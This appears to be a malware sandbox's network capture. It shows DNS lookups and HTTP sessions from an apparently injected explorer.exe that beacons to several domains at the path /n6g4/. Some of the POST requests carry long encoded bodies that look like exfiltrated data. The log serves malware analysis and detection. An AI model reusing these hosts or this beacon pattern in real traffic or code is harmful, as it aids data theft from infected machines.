                                                                                                      May 14, 2022 15:30:22.372586966 CEST8.8.8.8192.168.2.40x1c1bNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:28.466856956 CEST8.8.8.8192.168.2.40x622eNo error (0)www.bldh45.xyz35.241.47.216A (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:33.885291100 CEST8.8.8.8192.168.2.40x91ebNo error (0)www.properscooter.comproperscooter.comCNAME (Canonical name)IN (0x0001)
                                                                                                      May 14, 2022 15:30:33.885291100 CEST8.8.8.8192.168.2.40x91ebNo error (0)properscooter.com198.54.116.236A (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:39.960573912 CEST8.8.8.8192.168.2.40x5730No error (0)www.uspplongee.coma6.pingcache.comCNAME (Canonical name)IN (0x0001)
                                                                                                      May 14, 2022 15:30:39.960573912 CEST8.8.8.8192.168.2.40x5730No error (0)a6.pingcache.com38.34.163.59A (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:46.054826021 CEST8.8.8.8192.168.2.40x304cNo error (0)www.zeavd.comvip.myshopline.shopCNAME (Canonical name)IN (0x0001)
                                                                                                      May 14, 2022 15:30:46.054826021 CEST8.8.8.8192.168.2.40x304cNo error (0)vip.myshopline.shop104.17.232.29A (IP address)IN (0x0001)
                                                                                                      May 14, 2022 15:30:46.054826021 CEST8.8.8.8192.168.2.40x304cNo error (0)vip.myshopline.shop104.17.233.29A (IP address)IN (0x0001)
                                                                                                      • www.dems-clicks.com
                                                                                                      • www.jamesreadtanusa.com
                                                                                                      • www.kickball.site
                                                                                                      • www.bldh45.xyz
                                                                                                      • www.properscooter.com
                                                                                                      • www.uspplongee.com
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.4497685.183.8.18380C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:03.920893908 CEST1252OUTGET /n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV HTTP/1.1
                                                                                                      Host: www.dems-clicks.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      May 14, 2022 15:30:04.548072100 CEST1253INHTTP/1.1 404 Not Found
                                                                                                      Date: Sat, 14 May 2022 13:30:03 GMT
                                                                                                      Server: Apache/2.4.29 (Ubuntu)
                                                                                                      Content-Length: 281
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 65 6d 73 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.dems-clicks.com Port 80</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.44977435.209.127.15580C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:16.495182991 CEST7586OUTPOST /n6g4/ HTTP/1.1
                                                                                                      Host: www.jamesreadtanusa.com
                                                                                                      Connection: close
                                                                                                      Content-Length: 409
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.jamesreadtanusa.com
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://www.jamesreadtanusa.com/n6g4/
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Data Raw: 33 66 65 3d 63 39 68 48 6f 51 43 67 61 34 4f 30 7a 35 6a 51 43 6a 59 65 32 75 34 6b 41 71 6f 70 66 77 79 34 7e 77 52 67 35 72 35 6c 47 66 36 73 76 36 54 5a 77 5f 54 68 52 30 41 58 6e 58 35 35 42 67 57 6e 73 56 54 49 73 42 6e 57 4f 39 43 4f 34 4b 30 50 48 59 44 61 73 6d 67 57 43 4d 79 48 44 71 67 33 62 6e 6a 56 76 44 44 47 57 64 54 6d 41 4e 52 59 5a 6e 63 7a 34 43 39 38 39 52 54 4c 54 36 6f 55 39 77 48 6a 44 70 59 4f 59 65 75 36 62 67 31 55 79 72 6b 6f 68 70 71 39 59 4c 6d 59 4e 44 69 66 63 44 58 64 6f 4f 4a 33 52 43 4c 64 6f 79 31 4d 78 71 41 2d 73 31 33 43 30 46 71 55 30 6d 78 4b 49 45 78 4f 39 78 58 38 52 6b 78 35 4a 44 72 32 4f 52 6a 56 36 74 63 43 39 4a 6e 4c 44 78 71 66 73 32 75 55 61 6f 61 72 46 59 42 31 46 72 59 50 44 59 42 58 7a 31 69 47 4d 6e 6b 53 49 59 39 37 52 66 61 52 43 42 63 5f 61 74 58 62 72 63 45 74 59 55 6e 4a 42 55 68 35 30 54 6e 66 66 77 44 34 30 6f 41 6c 7e 70 63 7a 41 6b 4d 61 39 66 6e 47 6e 71 7e 6a 42 65 47 53 63 37 45 6b 4d 67 28 75 7e 37 30 62 37 78 48 4d 34 62 79 33 4a 63 68 74 51 48 43 54 56 36 79 75 37 47 62 7a 38 50 70 62 78 6a 56 50 76 56 28 78 36 51 55 46 74 69 70 43 45 44 4b 37 4f 79 6a 78 6f 62 74 52 49 4a 67 48 78 38 6d 64 66 4c 6b 65 43 64 79 73 50 54 38 45 49 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: 3fe=c9hHoQCga4O0z5jQCjYe2u4kAqopfwy4~wRg5r5lGf6sv6TZw_ThR0AXnX55BgWnsVTIsBnWO9CO4K0PHYDasmgWCMyHDqg3bnjVvDDGWdTmANRYZncz4C989RTLT6oU9wHjDpYOYeu6bg1Uyrkohpq9YLmYNDifcDXdoOJ3RCLdoy1MxqA-s13C0FqU0mxKIExO9xX8Rkx5JDr2ORjV6tcC9JnLDxqfs2uUaoarFYB1FrYPDYBXz1iGMnkSIY97RfaRCBc_atXbrcEtYUnJBUh50TnffwD40oAl~pczAkMa9fnGnq~jBeGSc7EkMg(u~70b7xHM4by3JchtQHCTV6yu7Gbz8PpbxjVPvV(x6QUFtipCEDK7OyjxobtRIJgHx8mdfLkeCdysPT8EIg).


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      10192.168.2.449785198.54.116.23680C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:34.060062885 CEST9286OUTPOST /n6g4/ HTTP/1.1
                                                                                                      Host: www.properscooter.com
                                                                                                      Connection: close
                                                                                                      Content-Length: 409
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.properscooter.com
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://www.properscooter.com/n6g4/
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Data Raw: 33 66 65 3d 4d 63 72 58 76 50 6c 39 44 31 61 41 74 71 5a 4c 36 5a 4f 71 77 51 61 46 76 46 6d 52 54 51 73 63 59 70 53 5a 4c 4e 54 6d 51 5a 53 5a 4b 47 37 6d 62 59 79 45 76 79 6e 74 35 74 4b 61 70 61 4b 71 69 6b 45 66 58 46 53 6d 49 73 68 71 4b 7a 47 44 36 4b 4c 68 35 37 58 35 31 2d 53 6b 63 6d 75 39 37 39 61 63 76 45 56 42 57 48 57 4d 76 6c 74 79 78 6b 71 4a 70 73 4d 68 75 75 51 6e 76 72 63 54 39 69 52 55 32 64 62 6d 76 54 4a 35 7e 4d 6d 46 74 39 41 37 47 32 74 53 46 61 6b 78 58 63 43 31 4c 61 4c 42 58 6b 7a 48 4c 58 76 50 44 57 56 38 69 59 34 6e 30 41 75 4e 6d 65 74 49 6c 7a 4a 69 4d 61 56 73 48 5a 58 50 43 48 7e 35 64 38 52 35 65 75 4b 47 6d 76 64 41 72 42 28 59 30 72 67 47 4c 50 58 65 4f 4c 39 78 63 57 4c 43 28 49 4c 37 4d 71 49 78 64 62 38 70 6b 6f 65 5a 6f 5f 6b 4b 63 72 77 45 28 54 75 38 6d 38 74 38 4c 2d 65 5f 52 6f 43 64 5a 72 78 6b 59 53 68 42 28 30 68 63 52 4a 73 74 45 59 4f 37 67 42 39 32 42 6e 61 65 45 6e 76 2d 45 34 78 5a 38 45 64 5a 72 52 74 72 37 69 6c 36 39 4f 33 73 44 67 58 58 67 4b 73 4e 41 4d 79 50 62 31 57 71 73 55 7e 55 32 4f 65 62 42 51 64 5a 76 4b 45 56 46 68 31 63 54 70 6c 55 36 44 54 47 33 48 76 31 74 77 37 6e 50 6b 69 64 41 36 79 5f 73 65 78 77 50 34 53 55 59 39 68 49 48 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: 3fe=McrXvPl9D1aAtqZL6ZOqwQaFvFmRTQscYpSZLNTmQZSZKG7mbYyEvynt5tKapaKqikEfXFSmIshqKzGD6KLh57X51-Skcmu979acvEVBWHWMvltyxkqJpsMhuuQnvrcT9iRU2dbmvTJ5~MmFt9A7G2tSFakxXcC1LaLBXkzHLXvPDWV8iY4n0AuNmetIlzJiMaVsHZXPCH~5d8R5euKGmvdArB(Y0rgGLPXeOL9xcWLC(IL7MqIxdb8pkoeZo_kKcrwE(Tu8m8t8L-e_RoCdZrxkYShB(0hcRJstEYO7gB92BnaeEnv-E4xZ8EdZrRtr7il69O3sDgXXgKsNAMyPb1WqsU~U2OebBQdZvKEVFh1cTplU6DTG3Hv1tw7nPkidA6y_sexwP4SUY9hIHg).
                                                                                                      May 14, 2022 15:30:34.233189106 CEST9287INHTTP/1.1 400 Bad request
                                                                                                      content-length: 90
                                                                                                      cache-control: no-cache
                                                                                                      content-type: text/html
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      11192.168.2.449786198.54.116.23680C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:34.235141993 CEST9300OUTPOST /n6g4/ HTTP/1.1
                                                                                                      Host: www.properscooter.com
                                                                                                      Connection: close
                                                                                                      Content-Length: 36477
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.properscooter.com
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://www.properscooter.com/n6g4/
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Data Raw: 33 66 65 3d 4d 63 72 58 76 4f 4a 56 48 45 48 51 6f 36 55 64 35 76 43 45 37 41 4b 48 74 31 71 55 5a 79 70 45 50 34 44 39 57 5a 58 66 43 4a 36 66 4f 79 6a 48 52 5f 65 6d 76 7a 57 44 77 2d 7e 57 36 4b 4f 72 69 6b 63 41 58 46 57 6d 4c 73 5a 36 4a 55 44 6f 39 73 33 67 36 62 57 63 30 2d 54 69 59 6b 62 79 37 39 65 45 76 48 30 61 57 33 36 4d 7e 32 56 79 6d 7a 57 30 6b 73 4d 37 6e 4f 42 34 77 37 41 64 39 69 5a 4d 32 59 6a 6d 36 7a 46 35 28 6f 69 45 6b 65 34 34 4c 47 74 58 51 71 6c 6e 65 38 65 66 4c 62 28 6a 58 6b 50 48 4c 6c 62 50 46 47 31 38 79 37 41 6d 28 51 75 56 73 2d 73 58 79 6a 31 33 4d 61 4a 67 48 63 6d 79 43 32 4b 35 66 4d 52 30 62 5f 54 37 71 63 6c 58 34 51 62 76 30 72 6b 5f 4c 61 33 57 4f 4a 70 52 61 6c 54 70 78 4b 54 52 4d 76 35 55 52 62 38 6c 38 34 66 62 6f 5f 6b 4d 63 72 77 6d 28 51 47 38 6d 5f 4e 38 45 39 57 5f 58 49 43 65 51 37 78 39 53 79 68 61 75 6b 73 51 52 4a 30 54 45 63 53 42 67 30 39 32 62 57 71 65 4d 67 37 78 4f 34 78 6c 71 30 64 65 76 52 74 65 37 69 6b 74 39 50 32 6e 43 54 7a 58 67 66 59 4e 43 5a 6d 50 64 46 57 71 6a 30 7e 53 28 75 69 4c 42 55 78 64 76 4b 30 5f 45 53 35 63 64 62 42 55 36 6e 6e 47 6b 6e 76 31 68 51 36 46 4a 31 58 30 43 4c 69 79 28 65 5a 4e 53 39 7a 71 64 5f 49 47 57 56 4a 6b 61 5f 66 79 69 57 4c 6d 4b 7a 64 2d 59 73 30 5f 6d 70 61 30 71 4f 62 47 36 46 4a 48 48 68 66 5f 61 5a 7e 71 38 67 68 42 6b 4d 39 49 77 62 49 71 75 39 52 63 56 73 6f 68 55 77 58 4a 41 53 4b 6a 47 42 41 62 63 61 7a 48 4f 5f 44 49 54 55 35 31 73 64 5a 31 4d 44 39 69 78 74 63 39 58 5f 42 52 73 68 42 51 67 6b 74 34 74 65 56 7a 45 47 54 54 5a 77 44 58 43 54 28 77 7e 48 71 74 67 68 57 48 64 42 6a 72 7e 53 4f 5a 6c 70 35 6e 41 57 34 71 34 44 5a 53 50 47 54 76 63 6a 6b 67 6a 6f 67 59 62 53 4c 72 79 61 35 61 55 37 6a 78 54 51 39 44 46 51 44 44 35 67 69 51 47 6e 47 6b 52 7a 6a 73 50 4e 4a 4a 6f 79 51 61 50 54 45 57 44 75 46 46 4c 6f 30 75 78 5f 28 4f 6d 33 47 4e 56 7a 77 4b 43 33 49 36 79 54 45 6f 34 30 73 68 7e 6a 69 4e 37 4f 4c 67 4c 6b 6b 47 47 68 79 44 62 65 69 70 74 71 58 74 6b 76 48 76 6e 52 48 4e 46 44 4c 6c 32 70 63 74 49 52 7a 4e 32 70 64 56 6d 6f 4b 50 37 45 50 4d 69 44 63 50 30 62 73 66 71 6f 45 63 64 69 4c 5f 57 6c 47 66 75 4f 6e 55 49 53 6e 71 7a 61 7a 63 6f 48 41 74 48 4b 5a 32 55 48 54 50 79 79 6b 4b 7e 45 7a 64 30 4c 34 5f 4a 59 41 6d 43 58 45 37 55 59 47 4c 72 72 69 38 6a 31 53 65 55 5a 37 61 74 54 73 4d 5a 61 58 34 67 67 4e 4c 6b 54 46 57 37 46 58 49 6b 61 74 5a 6d 79 6c 6f 45 71 62 64 54 5a 43 44 39 46 53 57 6c 62 7a 70 41 78 44 58 76 50 74 47 67 38 6f 6e 47 46 46 79 51 4f 61 39 55 6a 49 63 56 71 55 2d 59 69 52 73 6c 44 6b 59 4c 53 57 32 7a 61 76 52 75 37 38 32 51 79 46 65 77 4f 59 67 4f 35 4f 35 56 6a 69 50 4f 6f 47 44 45 6a 79 72 65 42 56 38 77 52 74 6f 6d 47 58 51 7e 4d 7a 34 30 53 4c 6e 33 34 6e 33 6d 56 43 41 43 30 63 53 42 68 71 58 4e 50 77 41 72 32 4b 36 64 31 68 79 75 6f 4f 57 39 4d 54 35 78 30 63 4b 54 61 52 76 59 4f 30 30 28 44 44 64 35 33 47 6a 37 75 45 50 73 61 48 6f 50 4c 58 4e 36 2d 4a 66 52 44 77 63 66 32 5a 70 58 38 74 4f 41 78 35 35 6c 34 69 75 41 33 64 70 28 78 6d 46 4e 56 58 6a 41 4d 6b 59 7e 62 42 31 79 72 33 66 37 66 31 44 4c 71 38 52 63 35 38 42 4c 6d 6c 47 79 76 50 46 63 59 58 49 38 76 74 33 62 47 38 33 52 49 4c 78 4a 70 53 59 64 32 36 44 4f 39 75 42 55 79 75 72 7e 4e 4c 39 4e 6d 31 59 43 64 50 51 4a 72 77 35 79 64 71 48 78 4a 7e 32 6e 6c 68 37 76 31 50 43 7a 45 67 62 43 68 6a 76 6e 4e 72 4c 51 72 69 71 69 52 62 61 66 6f 70 6d 6c 79 59 49 6c 38 6e 77 4a 34 55 6b 75 70 6d 74 64 49 5a 69 45 74 28 47 31 51 66 71 6f 64 31 4e 4f 34 32 49 28 56 7a 41 59 77 63 43 71 6a 6c 59 48 35 64 67 37 56 33 4a 39 6f 67 34 53 4c 6b 4a 70 4a 68 39 68 4d 68 68 48 37 63 44 46 6a 75 66 51 4a 44 68 4f 50 78 7a 6a 4c 35 69 37 69 75 43 7e 4a 68 5f 36 59 54 39 38 68 53 50 45 77 36 51 75 39 31 67 6a 6f 61 72 55 6e 71 4d 48 5a 64 73 34 31 62 48 43 66 6d 74 6d 52 56 6f 6e 46 70 6f 65 55 33 64 4d 6b 53 6f 4c 30 54 67 6c 59 68 58 76 4b 5a 62 61 36 64 53 4e 37 33 53 7a 68 74 6d 37 54 71 6e 70 47 34 49 37 74 47 70 75 39 6b 46 46 44 63 31 69 45 4a 64 63 4f 5a 62 50 66 68 68 67 4e 7a 69 64 38 61 50 48 38 41 4b 4a 53 63
                                                                                                      Data Ascii: 3fe=McrXvOJVHEHQo6Ud5vCE7AKHt1qUZypEP4D9WZXfCJ6fOyjHR_emvzWDw-~W6KOrikcAXFWmLsZ6JUDo9s3g6bWc0-TiYkby79eEvH0aW36M~2VymzW0ksM7nOB4w7Ad9iZM2Yjm6zF5(oiEke44LGtXQqlne8efLb(jXkPHLlbPFG18y7Am(QuVs-sXyj13MaJgHcmyC2K5fMR0b_T7qclX4Qbv0rk_La3WOJpRalTpxKTRMv5URb8l84fbo_kMcrwm(QG8m_N8E9W_XICeQ7x9SyhauksQRJ0TEcSBg092bWqeMg7xO4xlq0devRte7ikt9P2nCTzXgfYNCZmPdFWqj0~S(uiLBUxdvK0_ES5cdbBU6nnGknv1hQ6FJ1X0CLiy(eZNS9zqd_IGWVJka_fyiWLmKzd-Ys0_mpa0qObG6FJHHhf_aZ~q8ghBkM9IwbIqu9RcVsohUwXJASKjGBAbcazHO_DITU51sdZ1MD9ixtc9X_BRshBQgkt4teVzEGTTZwDXCT(w~HqtghWHdBjr~SOZlp5nAW4q4DZSPGTvcjkgjogYbSLrya5aU7jxTQ9DFQDD5giQGnGkRzjsPNJJoyQaPTEWDuFFLo0ux_(Om3GNVzwKC3I6yTEo40sh~jiN7OLgLkkGGhyDbeiptqXtkvHvnRHNFDLl2pctIRzN2pdVmoKP7EPMiDcP0bsfqoEcdiL_WlGfuOnUISnqzazcoHAtHKZ2UHTPyykK~Ezd0L4_JYAmCXE7UYGLrri8j1SeUZ7atTsMZaX4ggNLkTFW7FXIkatZmyloEqbdTZCD9FSWlbzpAxDXvPtGg8onGFFyQOa9UjIcVqU-YiRslDkYLSW2zavRu782QyFewOYgO5O5VjiPOoGDEjyreBV8wRtomGXQ~Mz40SLn34n3mVCAC0cSBhqXNPwAr2K6d1hyuoOW9MT5x0cKTaRvYO00(DDd53Gj7uEPsaHoPLXN6-JfRDwcf2ZpX8tOAx55l4iuA3dp(xmFNVXjAMkY~bB1yr3f7f1DLq8Rc58BLmlGyvPFcYXI8vt3bG83RILxJpSYd26DO9uBUyur~NL9Nm1YCdPQJrw5ydqHxJ~2nlh7v1PCzEgbChjvnNrLQriqiRbafopmlyYIl8nwJ4UkupmtdIZiEt(G1Qfqod1NO42I(VzAYwcCqjlYH5dg7V3J9og4SLkJpJh9hMhhH7cDFjufQJDhOPxzjL5i7iuC~Jh_6YT98hSPEw6Qu91gjoarUnqMHZds41bHCfmtmRVonFpoeU3dMkSoL0TglYhXvKZba6dSN73Szhtm7TqnpG4I7tGpu9kFFDc1iEJdcOZbPfhhgNzid8aPH8AKJScEmY22QNocEMr1QWGNHV9ONBRdfnyzM7afLkrGpDozETPUQJYYmjz_1RjpCKxzlN741fUlbgI4NlyvBqUQ1uOf~KHxdb9m~LUSpoVZSo8JHQlKFGLzenw5mw4eisw2QllG2ZGEXnKJpqs9POGE5xfLsMHTS6PSutC41mnomNoA7snD8OZSXsjCgKjcoUMkPeezr4wda-fI060xnuAyBlHKNYSAJbB2eal9oysbyX8_gOKsj5V8FWksUL6PZywP9AN9EMWwL8xn~JtRiLAEHic1a7t3LPkpi0G6cfcEqOIyVvyCL6X5nWGUYOCxLDjxon9yspnGRdR559Bvwvj_agYgOLCgO56CYohAzadQyLR6FgGRnPO4Lxfq3H5CWVGb4LF7bqkBn_AKxguOAY(fIrVZyehz2acZdIO-Dn4st5nzsm3rRHkpV5cEqCCRkgS3wqXdGjL4o-v_hB3VvqMJckcSgNJPagx7nJms9KvBKn3s697P49vRhWPVymhBahCnFNFzKnFVT9JVBmxxmm5bfkf6nkYoXV2eusBchWQ8DYaFy2NV6imNreqP17bO6nru3Ijd9cOcNJ1qYOAfUaAX3IHbngBEsbVNBk28~N0lU8TWGNh6HhpkkdBtF9yzfgIN5WUbzz1sVJ4AnLMAnk22(U35c-CakV1S2bRzJgtbVsdTR1r0gaQwSGeF84B9UpRmYFpx4i9WDoLNbmDBKlW_INs0rUnCyK4570ufk_WCcUOtxms_~A~99O927a6z1CzRc4aNwRcD7WbTLRxPcYpGc7~LvA0ohP1vKfhi6AvNg5~ryA4Y~P(S3GYeApo-5oHgHX4epOTbMAs0T7yD7eJkFCKBcUlkA0EiVhPGR0RaSsG_VFvtsE7S1FhrU3Kurb0MyxOjRRHB0sl40DRrmXJrfKIfxQUoZ7XEcdKG60Tf0o5FRaxRwezt4WQSQ4uwiXV01U70bw2N2VHkKshnvf3K5Ap4vNZ2YmQRkCfLftC6BFDrc0lbgk4EHR~gHmVVotlS0PkutkRYkVKOpW5HwunP(4dwAq9-369EGrlpV0JkDu81t5RZP-~Qbl8q5zZIZB7bxYfYvtoJEm4pFP93nJ6j7wBCfsMZQaShLlLfEWIYLTh4(4B8mCxAyPvimoShawrCkGDNkuqyGxFWncsRiiu1T6braS(KL0h_h5M8p-DVELy6YxCF3WL80VoI7OdtjUWnxv(ykaUk0ajOhOFucPhEO3U5oFdBqlHaR1RAr7GWs7EZnfoa6F3b1ILW7yHhPRmGsOIlMGpMwL~6wWsdKw3-bVCnFhgmKN9r3shI0dd_8Zq2~ovJJcZCUMeaIn0oLhuS9oaROJXdDETRonJueojfxPbxwNmp877Wt7(AJZlAgdcw7-9GV39v4m0_kyECWhHPF528f1D4km549NC8Ftm9hkKQH2o9eZ0AcFLIVMPbCpw461E1w1XsrbEgpTyoLirzJfGDZYoCfITLR9bRV_r0ojgDpiayndtSylWV988W0TYo6TlFZP2UghxnoN4qqGwSIRSjVx0o8pxPadc-Zpp1q6WNGrWlAC19yX2L1WzRjsg2sQvhEN(aVE54E9gtvtgcOxww~pRzxTrIBg4pxx2pUQfo2gkElkI82l8ACaQcxRauOrSHaVsI3cR4b-diiPGuc2JTmi4D(gEuO0EzafzfvWbec9AepSMHGQDz~y1EUOVoysjFeIXYoG2_puiZl7XIxF6X0cr1aG3DClIhXd4MBHT5ovl1HRKTANPjOOTiDOF75XWZp5LTFmamtYkf~KFmCMMJ8GU7~NniGKZ6REeVxKmVFXFjnToN6WgKSeZkFjwNvwPr7Mm0LhMS(EsGcESjiqanDOOnzgSE0v0w1cd8ZLt05299MQPgq4UD7Y8xBYb3gXScPctLFEr1tSvvFa7-CaZ1iZEgaxJ79DecgprPrPXfGqK95i4vpBec3mGGO4l9UEH8(4vTenGsTo3jL9S7gXgctNDTe1VsCYx4XJQpfjwzVY6oZlg8X70aDx1YrZ7kDfp1Vk6TEE(IItKzlTXUAGhEBhHnuIVEZQvXrlG08njZpH30zqC2EKigU5YjV0pIS4JLglSSAElsslED55NKI6RVMx4GC3xnlaLSURTdlX16Co5drpHa8HpzcYLqFPE1GCt8v8AI8uhsYfUnFe17ds7Ec0hPuULXgh6DlfNanGW-~J(WNBNJhMPN~U2K9y9rhDznkW1oh5y-ExJP3kuhpJJskJDa5DjCLlxNrt5nG0~iMxqvdzjUeY6scEPViG(eQs2sX5OY~lBbXN52llVgATWCMPZWQk8y2ldIdOjE4hxi1EKCu45mOy5lmFpd(I8aPvpIktoaYRJI5HwM7vfMTdc6czc3hJncIlfTOgPU1K2RVSUs2YEEUllNzgNcbsxzxYPDUFPQ5qa3lmhmHYZS2XJurDXRQNwYXPBvVzpF~zhVbaC60cNbt-9J(D6fldc_RwftYAf-Fc13nxtAOafpRDf5nQD3F2i9lEefW-4p(ZXbSawkhyR3hndQHLLJIYotcs8PnOOznu75veFQG9LnEVlQICUkBTzz2kLJGNIL7nqqS_zjFYtR81wuSAqPtIo-Bk9AODeVxCoS~R1GO56iinEExhNkvL64S2CyhuvSujeCgvI76kHif0S2(jh87iop7IKDPMvPoklvX_mPyETvzRPimn4kNUe_2OasPFpQayADM7a9JarF4mze7D
                                                                                                      May 14, 2022 15:30:34.585072041 CEST9325INHTTP/1.1 400 Bad request
                                                                                                      content-length: 90
                                                                                                      cache-control: no-cache
                                                                                                      content-type: text/html
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      12192.168.2.449787198.54.116.23680C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:34.411441088 CEST9324OUTGET /n6g4/?r2MLI=tjrDPFcXi&3fe=DeftxpR1OWSh4aZAk/LljwybnwLEUT8BN/DlQaDlT4i7MS32eqTj8UaDk/+v6eXHg19D HTTP/1.1
                                                                                                      Host: www.properscooter.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      May 14, 2022 15:30:34.596900940 CEST9326INHTTP/1.1 301 Moved Permanently
                                                                                                      keep-alive: timeout=5, max=100
                                                                                                      content-type: text/html
                                                                                                      content-length: 707
                                                                                                      date: Sat, 14 May 2022 13:30:34 GMT
                                                                                                      server: LiteSpeed
                                                                                                      location: https://www.properscooter.com/n6g4/?r2MLI=tjrDPFcXi&3fe=DeftxpR1OWSh4aZAk/LljwybnwLEUT8BN/DlQaDlT4i7MS32eqTj8UaDk/+v6eXHg19D
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      connection: close
